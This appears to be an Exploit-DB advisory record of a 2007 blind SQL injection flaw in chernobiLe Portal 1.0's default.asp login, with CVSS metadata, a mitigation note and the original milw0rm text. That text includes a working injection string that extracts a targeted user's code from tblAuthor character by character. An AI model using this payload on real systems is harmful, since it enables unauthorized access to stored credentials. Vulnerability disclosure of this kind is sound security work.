chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability

vendor:

chernobiLe Portal

by:

ajann

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: chernobiLe Portal

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability

The chernobiLe Portal 1.0 (default.asp) is vulnerable to remote SQL injection. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries when interacting with the database.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# $$      :  Not Free,Private


# Info    :  /*
            Turk Script Eklememen konusunda guzelce uyarmistim,ukalaca tamam demistin
            Fakat hala birsey bulmus gibi bazi sitelerde bu raporlarin basligini
            aciyorsun.Urastigin konuda bari acik birakma.Havani atmaya dvm et.
            *\

*******************************************************************************

[[SQL]]]

http://[target]/[path]//default.asp (POST Method) [SQL]

Example:

Method: One Char Brute Force Technique

First,Please Register Before:

User:[username]'/**/and/**/(substring((SELECT/**/user_code/**/FROM/**/tblAuthor/**/WHERE/**/username='targetuser'),1,1))='A'/*
Pass:[userpass]

If Login True Then First Character = A
elSe Continue...

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-27]